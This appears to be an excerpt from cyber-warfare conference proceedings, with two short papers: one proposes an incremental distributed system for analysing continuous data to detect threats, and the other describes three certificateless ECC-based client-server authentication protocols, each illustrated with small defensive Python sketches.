Corporate Hacking and Technology-Driven Crime: Social Dynamics and Implications. IGI Global, pp 170-<br />

186.<br />

Krekel, B., DeWeese, S., Bakos, G., Barnett, C. (2009) Capability of the People’s Republic of China to Conduct<br />

Cyber Warfare and Computer Network Exploitation. Report for the US-China Economic and Security<br />

Review Commission.<br />

Nazario, J. (2009) “Politically Motivated Denial of Service Attacks.” In Czosseck, C. & Geers, K. (Eds.) The Virtual<br />

Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp 163-181.<br />




Ottis, R. (2008) “Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective.”<br />

In Proceedings of the 7th European Conference on Information Warfare and Security. Reading: Academic<br />

Publishing Limited, pp 163-168.<br />

Ottis, R. (2009) ”Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability.” In Proceedings<br />

of the 8th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing<br />

Limited, pp 177-182.<br />

Ottis, R. (2010a) “From Pitch Forks to Laptops: Volunteers in Cyber Conflicts.” In Czosseck, C. and Podins, K.<br />

(Eds.) Conference on Cyber Conflict. Proceedings 2010. Tallinn: CCD COE Publications, pp 97-109.<br />

Ottis, R. (2010b) “Proactive Defence Tactics Against On-Line Cyber Militia.” In Proceedings of the 9th European<br />

Conference on Information Warfare and Security. Reading: Academic Publishing Limited, pp 233-237.<br />

Williams, G., Arreymbi, J. (2007) “Is Cyber Tribalism Winning Online Information Warfare?” In Proceedings of<br />

ISSE/SECURE 2007 Securing Electronic Business Processes. Wiesbaden: Vieweg. On-line:<br />

http://www.springerlink.com/content/t2824n02g54552m5/n<br />

Young, S., Aitel, D. (2004) The Hacker’s Handbook. The Strategy behind Breaking into and Defending Networks.<br />

Boca Raton: Auerbach.<br />





Work in Progress Papers<br />





Large-Scale Analysis of Continuous Data in Cyber-Warfare<br />

Threat Detection<br />

William Acosta<br />

University of Toledo, USA<br />

william.acosta@utoledo.edu<br />

Abstract: Combating cyber/information warfare threats requires analyzing vast quantities of diverse data. The<br />

data required to detect attacks as they occur (on-line analysis of live data) and predict future threats (forensic<br />

analysis/data mining) is not only large, but is growing at a staggering rate. Data such as network traffic logs,<br />

emails, social networking posts, SMS messages, and cell phone call logs are, by nature, continuous and<br />

growing. The problem addressed in this research is that current systems are not designed to handle the<br />

scope or nature of either the analysis or the data itself. For example, distributed data processing systems like Google’s<br />

Map-Reduce provide the ability to process large data sets, but they are not designed to easily support processing<br />

of changing data sets or data-mining algorithms. In light of this, Google has itself recently stopped using<br />

MapReduce for building its web-index, opting instead for a custom mechanism that can more quickly respond to<br />

and process new content. Non-traditional databases, like vertically-partitioned/column-store databases, can<br />

efficiently support analysis algorithms on large quantities of data, but they are not designed to support<br />

continuously changing data sets. The goal of this research is to explore and design a new data management<br />

system that can handle large quantities of incrementally growing data and directly support data mining<br />

and analysis algorithms. Specifically, this research proposes a new distributed data processing system that<br />

exploits the parallel and distributed resources/computation of cloud computing infrastructures. It makes use of<br />

summary data structures that can be updated incrementally and continuous queries to support analysis and data<br />

mining algorithms natively. This approach allows for larger-scale and more robust analysis on continuously<br />

growing data that can help detect, predict and respond to cyber-warfare threats.<br />

Keywords: data-mining, databases, text-search, cloud computing, data integration<br />

1. Introduction<br />

Protection against cyber/information warfare threats requires understanding the nature, methods, and<br />

patterns of those attacks. Such understanding can allow for early detection and, possibly, prediction<br />

of attacks. Gaining an understanding of the patterns and mechanisms used in cyber/information<br />

warfare attacks requires analyzing large amounts of diverse data such as server logs (Myers et al.<br />

2010), emails, SMS messages, and social-networking data. Not only is the data diverse, but it is also<br />

continuous; new data gets generated every day. Furthermore, analysis of this data can require<br />

equally diverse approaches: graph-theoretic algorithms (detecting patterns in social-networking), data<br />

mining algorithms (associations between events), statistical models, clustering algorithms, etc. The<br />

diverse nature of the data and analysis algorithms as well as the large quantity of data to be analyzed<br />

poses problems for both traditional databases and storage systems. In order to provide the analysis of<br />

diverse and continuous data required for cyber-warfare threat detection, a new system is needed for<br />

managing large quantities of diverse data that can support equally diverse analysis algorithms.<br />

The need to incrementally process large quantities of data is applicable to a wide range of applications.<br />

For example, Google replaced MapReduce (Dean & Ghemawat 2004), its former web-indexing<br />

system, in order to enable faster updates of its index (Metz 2010, Peng & Dabek 2010). Similarly,<br />

detecting and responding to information security threats requires a mechanism that can not only<br />

manage large quantities of data, but also provide for fast response time of complex, continuous<br />

analysis. This paper proposes a new distributed data-analysis framework that is designed to meet the<br />

needs of applications that require analysis of continuous data. Next, Section 2 presents the design of<br />

the proposed system in the context of related work. Section 3 then provides concluding remarks.<br />

2. Design and requirements of a continuous data analysis system<br />

Cyber-warfare threat detection requires analyzing large quantities of diverse data that is continuously<br />

generated. The properties of the raw data in this type of application impose some constraints on the<br />

analysis and data storage systems. These applications require analyzing not only current data, but<br />

also prior/historical data from many heterogeneous sources. Because the raw data is continuously<br />

generated, old data must be kept for analysis while new data is integrated into the storage and<br />

analysis framework. Because old data must be kept and not changed, the system need not support<br />

updates of raw data. Effectively, raw data is append-only. This can be leveraged to improve storage<br />

efficiency and performance; it is easier to implement and support distributed storage as no write-<br />




locking of existing data is necessary. It also allows the analysis framework to make use of novel<br />

summary data structures and algorithms that can incorporate the changes made to the data without<br />

requiring analysis of the full dataset.<br />
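
The incrementally updatable summary structures described above can be illustrated with a count-min sketch. The following Python sketch is a hypothetical illustration only; the class, hash choice and parameters are this sketch's own assumptions, not the proposed system's actual design:<br />

```python
import hashlib

class CountMinSketch:
    """Approximate event counter that absorbs incremental updates
    without ever revisiting the raw (append-only) data."""
    def __init__(self, width=1024, depth=4):
        self.width, self.depth = width, depth
        self.table = [[0] * width for _ in range(depth)]

    def _buckets(self, item):
        # One bucket per row, derived from a salted hash of the item.
        for row in range(self.depth):
            digest = hashlib.sha256(f"{row}:{item}".encode()).hexdigest()
            yield row, int(digest, 16) % self.width

    def add(self, item, count=1):
        # O(depth) per new record: suits a continuously growing log.
        for row, col in self._buckets(item):
            self.table[row][col] += count

    def estimate(self, item):
        # Never underestimates; collisions can only inflate the count.
        return min(self.table[row][col] for row, col in self._buckets(item))

sketch = CountMinSketch()
for ip in ["10.0.0.1"] * 5 + ["10.0.0.2"] * 2:
    sketch.add(ip)
print(sketch.estimate("10.0.0.1"))  # an upper-bound estimate; here exactly 5
```

Each new log record costs a constant amount of work, so the summary stays current as data streams in, without any batch re-analysis of the full dataset.<br />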

2.1 Storage and data management<br />

The large quantity of data makes a centralized storage solution infeasible; instead, a distributed<br />

storage solution is favored. The parallel nature of many of the algorithms makes a distributed solution<br />

not only more feasible, but also desirable. Distributed storage systems such as Google’s BigTable<br />

(Chang et al. 2006), Yahoo’s PNUTS (Cooper et al. 2008), and Amazon’s Dynamo (DeCandia et al.<br />

2007) provide the low-level mechanisms for storing and managing large quantities of data. These<br />

systems were designed to support coordinated reads and updates of data in a distributed<br />

environment. To support the needs of applications like cyber-warfare threat detection, a distributed<br />

storage system should provide efficient, low-level support for append-only writes of raw data, as well<br />

as efficient tracking of incremental additions and updates of the dataset.<br />
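
The append-only discipline and offset-based tracking of incremental additions can be sketched as follows. This is a minimal single-node illustration under assumed names; a real deployment would sit on a distributed store such as those cited above:<br />

```python
class AppendOnlyStore:
    """Minimal append-only store: records are immutable once written,
    so no write-locking of existing data is ever needed, and consumers
    can track incremental additions by offset alone."""
    def __init__(self):
        self._log = []

    def append(self, record):
        self._log.append(record)     # the only mutation allowed
        return len(self._log) - 1    # offset doubles as a stable record id

    def read_since(self, offset):
        # An analysis job resumes cheaply from its last checkpoint.
        return self._log[offset:]

store = AppendOnlyStore()
store.append({"src": "10.0.0.1", "event": "login_fail"})
checkpoint = store.append({"src": "10.0.0.2", "event": "port_scan"}) + 1
store.append({"src": "10.0.0.1", "event": "login_fail"})
print(store.read_since(checkpoint))  # [{'src': '10.0.0.1', 'event': 'login_fail'}]
```

Because old records never change, readers need no locks and incremental analysis reduces to remembering a single offset per consumer.<br />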

2.2 Distributed processing of data<br />

Recently, there has been a great deal of research in Google’s MapReduce (Dean & Ghemawat 2004)<br />

distributed computing software framework for processing large datasets. However, owing to its batch-oriented<br />

nature, it was not designed to deal with incremental or continuous data updates. This makes it<br />

unsuitable for a variety of applications including cyber-warfare threat analysis and detection. Systems<br />

like Haloop (Bu et al. 2010) and MapReduce Online (Condie et al. 2010) have sought to add<br />

continuous query support to MapReduce. To achieve this, these systems had to make fundamental<br />

changes to the API and underlying architecture of MapReduce. This paper argues that what is<br />

needed instead is a system designed from the ground-up to support the demands of analysis and<br />

mining algorithms on large sets of continuously generated data.<br />

2.3 Data management and analysis<br />

The problem of analyzing continuous data has been explored by stream databases (Abadi et al. 2005,<br />

Shah et al. 2004). Similarly, continuous queries in databases have been proposed with systems such<br />

as TelegraphCQ (Chandrasekaran et al. 2003) and CQL (Arasu et al. 2006). These systems can<br />

handle processing queries on streams of data with long-running/continuous queries. However, they<br />

lack the ability to support analytic algorithms over a large and diverse dataset. In contrast,<br />

vertically-partitioned databases such as C-Store (Stonebraker et al. 2005) excel at fast and efficient support of<br />

complex analytics. Unfortunately, vertically-partitioned databases suffer from poor performance on<br />

writes. In essence, insertions and updates require that the index be rebuilt. Although performance of<br />

reads is very fast once the index is built, building the index is very expensive. What is needed is a<br />

system that can perform complex analytics on continuous data without requiring a complex index to<br />

be completely rebuilt as a result of data updates. This paper proposes a new, incremental indexing<br />

system that keeps track of summarized historical data while allowing for many small, incremental<br />

updates to be incorporated. The key difference is that, unlike traditional database indexes, the new<br />

incremental index would not be built off-line (batch-processed). Instead, the index would incorporate the<br />

many incremental updates on-line so that the index of past data is always active and valid.<br />
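
One way such an incremental index could behave is sketched below, assuming a base/delta split (the class and names are illustrative assumptions, not the paper's actual design): small updates land in a delta that queries see immediately, and a cheap periodic merge folds the delta into the base, so the index is never rebuilt from scratch.<br />

```python
from collections import defaultdict

class IncrementalIndex:
    """Keeps a large 'base' posting index plus a small in-memory delta.
    New records cost O(terms) to index; queries union both views, so the
    index of past data stays active and valid while updates stream in."""
    def __init__(self):
        self.base = defaultdict(set)    # settled postings (read-optimized)
        self.delta = defaultdict(set)   # recent, unmerged postings

    def add(self, doc_id, terms):
        for term in terms:
            self.delta[term].add(doc_id)

    def query(self, term):
        # A lookup sees old and new data without any batch rebuild.
        return self.base[term] | self.delta[term]

    def merge(self):
        # Periodic, cheap fold of the delta into the base segment --
        # nothing like the full index rebuild a column store would need.
        for term, docs in self.delta.items():
            self.base[term] |= docs
        self.delta.clear()

idx = IncrementalIndex()
idx.add("log-001", ["ssh", "failed", "login"])
idx.merge()
idx.add("log-002", ["ssh", "accepted"])   # arrives after the merge
print(sorted(idx.query("ssh")))           # ['log-001', 'log-002']
```

The design choice mirrors the argument in the text: writes stay cheap because only the small delta is touched, while reads remain correct because they consult both structures.<br />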

In addition to the storage and distributed computing framework, it is also important to consider the<br />

needs of the algorithms that will be used in the system. Applications with such diverse data require<br />

equally diverse analysis. For example, detecting hidden correlations and associations between events<br />

seen in server logs requires mining association rules (Agrawal & Srikant 1994) whereas detecting<br />

the interaction of attackers in a network may involve graph-theoretic algorithms.<br />
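
The association-rule style of analysis can be illustrated with a single Apriori-style counting pass over event "transactions" (a simplified sketch with made-up event names; Agrawal and Srikant's full algorithm iterates over progressively larger itemsets):<br />

```python
from collections import Counter
from itertools import combinations

def frequent_pairs(transactions, min_support):
    """Count co-occurring event pairs across log 'transactions' and keep
    those whose support (fraction of transactions) meets the threshold."""
    counts = Counter()
    for events in transactions:
        for pair in combinations(sorted(set(events)), 2):
            counts[pair] += 1
    n = len(transactions)
    return {pair: c / n for pair, c in counts.items() if c / n >= min_support}

# Hypothetical per-host event sets extracted from server logs.
logs = [
    {"port_scan", "failed_login"},
    {"port_scan", "failed_login", "priv_escalation"},
    {"failed_login", "priv_escalation"},
    {"port_scan", "failed_login"},
]
rules = frequent_pairs(logs, min_support=0.75)
print(rules)  # {('failed_login', 'port_scan'): 0.75}
```

A correlation like the one surfaced here (scans co-occurring with failed logins) is exactly the kind of hidden association the text envisions mining from server logs.<br />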

3. Conclusion<br />

This paper presents a case for a new distributed computing system that is explicitly designed to meet<br />

the unique needs of applications such as cyber-warfare threat detection. The system should support<br />

large quantities of diverse data such as server logs, emails, social-network data, etc. It should allow<br />

for a variety of mining and analysis algorithms and allow those algorithms to be executed in a<br />

parallel and distributed manner. The system must not only meet these needs, but also do so in a way<br />

that can efficiently support continuous analysis of data that is continuously generated.<br />



References<br />


Abadi, D. J., Ahmad, Y., Balazinska, M., Cherniack, M., hyon Hwang, J., Lindner, W., Maskey, A. S., Rasin, E.,<br />

Ryvkina, E., Tatbul, N., Xing, Y. & Zdonik, S. (2005), The design of the borealis stream processing engine,<br />

in ‘CIDR ’05: Proceedings of the second biennial Conference on Innovative Data Systems Research’, pp.<br />

277–289.<br />

Agrawal, R. & Srikant, R. (1994), Fast algorithms for mining association rules, in J. B. Bocca, M. Jarke & C.<br />

Zaniolo, eds, ‘Proc. 20th Int. Conf. Very Large Data Bases, VLDB’, Morgan Kaufmann, pp. 487–499.<br />

Arasu, A., Babu, S. & Widom, J. (2006), ‘The cql continuous query language: semantic foundations and query<br />

execution’, The VLDB Journal 15(2), 121–142.<br />

Bu, Y., Howe, B., Balazinska, M. & Ernst, M. D. (2010), Haloop: Efficient iterative data processing on large<br />

clusters, in ‘Proceedings of the VLDB Endowment’, Vol. 3.<br />

Chandrasekaran, S., Cooper, O., Deshpande, A., Franklin, M. J., Hellerstein, J. M., Hong, W., Krishnamurthy, S.,<br />

Madden, S., Raman, V., Reiss, F. & Shah, M. (2003), Telegraphcq: Continuous dataflow processing for an<br />

uncertain world, in ‘CIDR ’03: Proceedings of the first biennial Conference on Innovative Data Systems<br />

Research’.<br />

Chang, F., Dean, J., Ghemawat, S., Hsieh, W. C., Wallach, D. A., Burrows, M., Chandra, T., Fikes, A. & Gruber,<br />

R. E. (2006), Bigtable: A distributed storage system for structured data, in ‘Proceedings of the 7th<br />

symposium on Operating systems design and implementation (OSDI ’06)’, Seattle, WA.<br />

Condie, T., Conway, N., Alvaro, P., Elmeleegy, J. M. H. K. & Sears, R. (2010), Mapreduce online, in<br />

‘Proceedings of the Seventh USENIX Symposium on Networked System Design and Implementation (NSDI<br />

2010)’, San Jose, CA.<br />

Cooper, B. F., Ramakrishnan, R., Srivastava, U., Silberstein, A., Bohannon, P., arno Jacobsen, H., Puz, N.,<br />

Weaver, D. & Yerneni, R. (2008), Pnuts: Yahoo!’s hosted data serving platform, in ‘Proceedings of the 34th<br />

International Conference on Very Large Data Bases (VLDB ’08)’, Auckland, New Zealand.<br />

Dean, J. & Ghemawat, S. (2004), Mapreduce: simplified data processing on large clusters, in ‘OSDI’04:<br />

Proceedings of the 6th conference on Symposium on Operating Systems Design & Implementation’,<br />

USENIX Association, Berkeley, CA, USA, pp. 10–10.<br />

DeCandia, G., Hastorun, D., Jampani, M., Kakulapati, G., Lakshman, A., Pilchin, A., Sivasubramanian, S.,<br />

Vosshall, P. & Vogels, W. (2007), Dynamo: amazon’s highly available key-value store, in ‘SOSP ’07:<br />

Proceedings of twenty-first ACM SIGOPS symposium on Operating systems principles’, ACM, New York,<br />

NY, USA, pp. 205–220.<br />

Metz, C. (2010), ‘Google search index splits with mapreduce’. URL:<br />

http://www.theregister.co.uk/2010/09/09/google_caffeine_explained/<br />

Myers, J., Grimaila, M. & Mills, R. (2010), Insider threat detection using distributed event correlation of web<br />

server logs, in ‘ICIW ’10: Proceedings of the 5th International Conference on Information-Warfare and<br />

Security’.<br />

Peng, D. & Dabek, F. (2010), Large-scale incremental processing using distributed transactions and notifications,<br />

in ‘OSDI ’10: Proceedings of the Ninth USENIX Symposium on Operating Systems Design and<br />

Implementation’.<br />

Shah, M. A., Hellerstein, J. M. & Brewer, E. (2004), Highly available, fault-tolerant, parallel dataflows, in<br />

‘SIGMOD ’04: Proceedings of the 2004 ACM SIGMOD international conference on Management of data’,<br />

ACM, New York, NY, USA, pp. 827–838.<br />

Stonebraker, M., Abadi, D. J., Batkin, A., Chen, X., Cherniack, M., Ferreira, M., Lau, E., Lin, A., Madden, S.,<br />

O’Neil, E., O’Neil, P., Rasin, A., Tran, N. & Zdonik, S. (2005), C-store: a column-oriented dbms, in ‘VLDB<br />

’05: Proceedings of the 31st international conference on Very large data bases’, VLDB Endowment, pp.<br />

553–564.<br />



A System and Method for Designing Secure Client-Server<br />

Communication Protocols Based on Certificateless PKI<br />

Natarajan Vijayarangan<br />

Tata Consultancy Services Limited (TCS), Chennai, India<br />

n.vijayarangan@tcs.com<br />

Abstract: Client-server networking is a distributed application architecture that partitions tasks or work loads<br />

between service providers (servers) and service requesters (clients), where the network communication is not<br />

necessarily secure. A number of researchers and organizations have produced innovative methods to ensure a<br />

secure communication in the client-server set up. In this paper, however, TCS brings out a system of novel<br />

network security protocols for a generic purpose. Let us take a brief look at the history of client-server<br />

communication. In 1993 Bellovin and Merritt patented a strong Password-Authenticated Key Exchange<br />

(PAKE), an interactive method for two or more parties to establish cryptographic keys based on one or more<br />

party's knowledge of a password. Later, Stanford University patented the Secure Remote Password (SRP) protocol, a<br />

new password authentication and key-exchange mechanism over an untrusted network. Then Sun Microsystems<br />

implemented the Elliptic Curve Cryptography (ECC) technology which is well integrated into the OpenSSL-<br />

Certificate Authority. This code enables secure TLS/SSL handshakes using the Elliptic curve based cipher suites.<br />

In this paper, we propose a set of client-server communication protocols using certificateless Public Key<br />

Infrastructure (PKI) based on ECC. The protocols provide identity-based authentication without using bilinear<br />

maps, session key exchange and secure message transfer. Moreover, we show that the protocols are<br />

lightweight and are designed to serve multiple applications.<br />

Keywords: certificateless public key cryptography, elliptic curve cryptography, Jacobi identity, message<br />

preprocessing, Lie algebras, challenge-response<br />

1. Introduction<br />

In the existing network operating systems, communication between the client and server takes place<br />

using File Transfer Protocol mode which is not a secure medium. The more secure medium for<br />

communication, Hypertext Transfer Protocol Secure, secures the connection but not the<br />

messages themselves. For instance, some of the problems that users of a set-top box unit encounter<br />

would be data loss, content modification and so on. TCS has designed a set of novel network security<br />

protocols to avoid these issues and ensure robust communication between the client and server.<br />

Theoretical and practical analysis has shown that the proposed protocols are<br />

secure against replay and rushing attacks. In this design, the certificateless PKI concept based on<br />

ECC (Al-Riyami and Paterson 2003, Hankerson et al 2004) is introduced to strengthen the protocols.<br />

Hence TCS has filed a patent application for this invention.<br />

2. Objectives of the invention<br />

The objectives of the invention are to provide: 1) a secure communication between client and server,<br />

2) a robust, tamper-proof and lightweight authentication mechanism, 3) non-repudiation for clients and<br />

4) no password-based negotiation between client and server.<br />

3. Overview of the invention<br />

In the existing network security protocols, certificate-based public key cryptography and identity-based<br />

cryptography have been widely used. These cryptographic methods face the costly and complex key<br />

management problem and the key escrow problem in the real-life deployment. A few years ago,<br />

Certificateless Public Key Cryptography (CL-PKC) was introduced to address these problems, which<br />

have not been solved fully. Sometimes, CL-PKC uses bilinear pairings (Shamir 1984) and inverse<br />

operations, which slow down the performance of the authentication process.<br />

TCS' new approach towards the network security protocols will solve the common problems between<br />

customers and network service providers or agents. Many researchers and organizations have<br />

developed innovative client-server communication protocols based on certificates which require a lot<br />

of computation, power consumption and memory space. TCS has designed a lightweight protocol that<br />

will overcome these issues.<br />

TCS has introduced CL-PKC with no bilinear pairings in the proposed set of network security protocols. These protocols are efficient, resist common attacks, and have applications in client-server setups over Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) networks, set-top box units and telecommunications. The three network security protocols (NSP 1, 2 and 3) that TCS has developed are explained in the following sections.

4. Description of NSP 1

TCS has designed a network security protocol in a generic manner to ensure secure communication between client and server. The protocol initially lets the server act as a Key Generation Center (KGC), distributing public and private keys to clients. Later, every client generates its own pair of public and private keys for authentication and session key generation. No certificate is exchanged in this protocol. Robust and well-proven algorithms, ECDSA (Elliptic Curve Digital Signature Algorithm) and the ECDH (Elliptic Curve Diffie-Hellman) key exchange (Certicom Research 2000), are used for authentication and session key generation respectively.

Following is the workflow of NSP 1:
- (Pre-shared key mechanism) Every client has a pair of public and private keys generated by the server, which acts as a Key Generation Center (KGC).
- Client initiates the communication by sending the message ‘Client Hello!’ to the server.
- Server generates an n-bit Random Challenge (RC) using a Pseudo Random Number Generator (PRNG) and encrypts RC with the client's public key using the Elliptic Curve Encryption (ECE) method.
- Client decrypts the encrypted RC with its private key using ECE.
- Client generates public and private keys on a NIST elliptic curve (256/384/512). Client signs the challenge and sends the signature to the server.
- Server verifies the signature and generates a key pair on the same curve. Server sends its public key to the client.
- Client and server negotiate an m-bit shared secret key using the ECDH algorithm.
- Client and server derive an m-bit session key for encryption and agree on a cipher suite.
- A secure communication channel is established between client and server.
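The handshake above can be sketched end to end in code. The sketch below is illustrative only: finite-field Diffie-Hellman over the published RFC 3526 group 14 stands in for ECDH, and an HMAC tag stands in for the ECDSA signature, since the Python standard library has no elliptic-curve primitives; all names and parameters are hypothetical stand-ins, not the patented design.

```python
import hashlib, hmac, secrets

# Toy stand-in for the NSP 1 flow: challenge-response, then a
# Diffie-Hellman session-key negotiation (finite-field DH replaces
# ECDH purely for illustration; a real deployment uses ECDH/ECDSA).
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF  # RFC 3526 group 14
G = 2

def dh_keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)

# Pre-shared step: the KGC (server) issues the client key material;
# here a shared MAC key stands in for the client's ECC key pair.
client_mac_key = secrets.token_bytes(32)

# Server -> Client: random challenge RC (sent encrypted in NSP 1).
rc = secrets.token_bytes(16)

# Client signs the challenge (HMAC stands in for ECDSA).
signature = hmac.new(client_mac_key, rc, hashlib.sha256).digest()

# Server verifies the signature before continuing.
assert hmac.compare_digest(
    signature, hmac.new(client_mac_key, rc, hashlib.sha256).digest())

# Both sides generate key pairs on the same group and run the exchange.
c_priv, c_pub = dh_keypair()
s_priv, s_pub = dh_keypair()
client_secret = pow(s_pub, c_priv, P)
server_secret = pow(c_pub, s_priv, P)

# Hash the shared secret down to an m-bit session key (m = 256 here).
def session_key(shared: int) -> bytes:
    return hashlib.sha256(shared.to_bytes(256, "big")).digest()

assert session_key(client_secret) == session_key(server_secret)
```

The asserts mirror the protocol's two checkpoints: the server rejects the session if the challenge signature fails, and both parties must arrive at the same session key before ciphertext flows.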

5. Description of NSP 2

In network security protocol 2 there is no initial setup to generate a pair of public and private keys for client and server. Instead, the client and the server share a unique Message Preprocessing (MP) function (Vijayarangan 2009), a bijective mapping, which ensures that no modification has taken place when a random challenge is sent in plain. As part of the communication setup, each client receives a unique MP function and an ID (the client's identity number) supplied by the server. The MP algorithm (three operations applied in sequence: shuffling, a T-function and an LFSR) converts a message into a randomized message. Analysis shows that, thanks to the MP function, NSP 2 withstands an attacker who predicts RC values during the communication better than NSP 1 does.
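An MP-style function can be illustrated with the three stages named above. The concrete choices below (the permutation, the Klimov-Shamir-style byte T-function, the 8-bit LFSR taps) are hypothetical stand-ins chosen for the demo, not TCS's patented MP design; the point is only that each stage, and hence their composition, is invertible.

```python
# Illustrative bijective message-preprocessing (MP) function built
# from the three stages named in the text: shuffling, a T-function
# and an LFSR keystream.

BLOCK = 8  # operate on 8-byte messages for the demo

# Stage 1: shuffling -- a fixed byte permutation and its inverse.
PERM = [3, 7, 0, 5, 1, 6, 2, 4]
INV_PERM = [PERM.index(i) for i in range(BLOCK)]

# Stage 2: an invertible byte T-function (Klimov-Shamir style:
# x -> x + (x^2 | 5) mod 256 is a bijection on 0..255).
def t(x): return (x + ((x * x) | 5)) % 256
T_INV = {t(x): x for x in range(256)}   # invert by table lookup
assert len(T_INV) == 256                # confirms t is a bijection

# Stage 3: LFSR keystream XOR (XOR with a fixed stream self-inverts).
def lfsr_stream(n, state=0xB4):
    out = []
    for _ in range(n):
        out.append(state)
        bit = ((state >> 7) ^ (state >> 5) ^ (state >> 4) ^ (state >> 3)) & 1
        state = ((state << 1) | bit) & 0xFF
    return out

def mp(msg: bytes) -> bytes:
    shuffled = [msg[PERM[i]] for i in range(BLOCK)]
    mixed = [t(b) for b in shuffled]
    return bytes(b ^ k for b, k in zip(mixed, lfsr_stream(BLOCK)))

def mp_inv(out: bytes) -> bytes:
    mixed = [b ^ k for b, k in zip(out, lfsr_stream(BLOCK))]
    shuffled = [T_INV[b] for b in mixed]
    return bytes(shuffled[INV_PERM[i]] for i in range(BLOCK))

rc = bytes([5, 200, 13, 77, 0, 255, 42, 9])
assert mp_inv(mp(rc)) == rc        # bijective: MP can be undone
assert mp(rc) != mp(bytes(8))      # distinct RCs give distinct MP values
```

Because MP is a bijection, the server can check MP(RC) against the RC it receives in plain: an attacker who substitutes RC cannot produce the matching MP(RC) without knowing the client's MP function.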

Following is the workflow of NSP 2:
- Client initiates the communication by sending the message ‘Client Hello!’ to the server.
- Server generates an n-bit Random Challenge (RC) using a Pseudo Random Number Generator (PRNG) and computes the message preprocessing of RC. Client receives RC and MP(RC) and verifies MP(RC).
- Client generates public and private keys on a NIST elliptic curve (256/384/512). Client signs the message = {RC || ID} and sends the signature together with its public key and MP(public key) to the server.
- Server verifies the signature and generates a key pair on the same curve. Server sends its public key to the client.
- Client and server negotiate an m-bit shared secret key using the ECDH algorithm.
- Client and server derive an m-bit session key for encryption and agree on a cipher suite.
- A secure communication channel is established between client and server.

6. Description of NSP 3

NSP 3 is similar to network security protocol 1; the difference lies in signature generation. The client uses the Jacobi identity, a special product on Lie algebras (Jacobson 1979), to authenticate the server. The Jacobi identity operates on a random challenge RC = x || y || z (divided into three parts, i.e. trifurcated) and satisfies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Note that the Lie product (Lie bracket) has the special property [x,y] = -[y,x].
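The Jacobi identity and the antisymmetry property can be checked concretely. The sketch below instantiates the Lie bracket as the cross product on R^3, a standard example of a Lie bracket; the three integer vectors play the role of the trifurcated challenge x || y || z.

```python
# Verify the Jacobi identity [[x,y],z] + [[y,z],x] + [[z,x],y] = 0
# using the cross product on R^3 as the Lie bracket.

def bracket(a, b):  # cross product: a Lie bracket on R^3
    return (a[1]*b[2] - a[2]*b[1],
            a[2]*b[0] - a[0]*b[2],
            a[0]*b[1] - a[1]*b[0])

def add(u, v):
    return tuple(ui + vi for ui, vi in zip(u, v))

# Three vectors standing in for the trifurcated challenge RC = x||y||z.
x, y, z = (3, 1, 4), (1, 5, 9), (2, 6, 5)

# Antisymmetry: [x, y] = -[y, x]
assert bracket(x, y) == tuple(-c for c in bracket(y, x))

# Jacobi identity: the cyclic sum of nested brackets vanishes.
jacobi = add(add(bracket(bracket(x, y), z),
                 bracket(bracket(y, z), x)),
             bracket(bracket(z, x), y))
assert jacobi == (0, 0, 0)
```

This also shows why Abelian Lie algebras are excluded in the text: if every bracket were zero, any forged value would trivially satisfy the identity and the check would authenticate nothing.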

Following is the workflow of NSP 3:
- (Pre-shared key mechanism) Every client has a pair of public and private keys generated by the server, which acts as a Key Generation Center (KGC).
- Client initiates the communication by sending the message ‘Client Hello!’ to the server.
- Server generates an n-bit Random Challenge (RC) using a Pseudo Random Number Generator (PRNG) and encrypts RC with the client's public key using the Elliptic Curve Encryption (ECE) method.
- Client decrypts the encrypted RC with its private key using ECE.
- Client computes the Jacobi identity on RC = x || y || z and sends the Lie product [[x,y],z] to the server.
- Server verifies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Server sends its ECC public key to the client.
- Client and server negotiate an m-bit shared secret key using the ECDH algorithm.
- Client and server derive an m-bit session key for encryption and agree on a cipher suite.
- A secure communication channel is established between client and server.

7. Analysis

The proposed network security protocols do not allow replay and rushing attacks. An attacker cannot guess the random challenge (RC) in NSP 1, since it travels in encrypted form. It is therefore safe to use NSP 1 across different nodes/channels.

NSP 2 differs from NSP 1 in that it sends RC in plain together with MP(RC). The bijective property of MP means that an attacker can change RC but not MP(RC): given two distinct random challenges RC1 and RC2, MP(RC1) is not the same as MP(RC2). If the attacker tries to insert another random challenge, the server can detect the fraud by verifying the client's signature. Since the MP function's shuffling, T-function and LFSR operations are invertible (Vijayarangan and Vijayasarathy 2005, Vijayarangan 2009), the inverses MP^-1(MP(RC1)) and MP^-1(MP(RC2)) are computed through a primitive polynomial of the LFSR, the inverse T-function and de-shuffling, and the recovered values RC1 and RC2 must be distinct.

In NSP 3, the server will not find the Jacobi identity satisfied if an attacker changes RC. The rationale for using the Jacobi identity is that the Lie product computed on RC at the client end must match at the server end. The server checks the Jacobi identity and thereby ensures that the same client has sent the Lie product. If the attacker alters a Lie product, the server can detect the fraud by verifying the Jacobi identity. Note that Abelian Lie algebras (where [x,y] = 0 for every x and y) must not be used.

From the above protocols we can state the proposition that dishonest clients can be eliminated in a Mesh Topology Network (MTN) based on NSP 1, 2 and 3. Thus a system of protocols 1, 2 and 3 can be plugged into an MTN, yielding a strong and secure network.


The proposed Mesh Topology Network (MTN), illustrated in Figure 1, is an integrated network in which all the protocols (NSP 1, 2 and 3) are connected to each other. In the topology, every protocol is connected to the other protocols through hops, and each protocol itself acts as a node (mote). Some nodes are connected through single hops and some through more than one hop. The mesh network is designed to be continuously connected: even if one node fails, the network finds an alternate route to transfer the data.

[Figure 1 omitted: NSP 1, NSP 2 and NSP 3 connected through the MTN, forming a group of network security protocols based on certificateless PKI.]

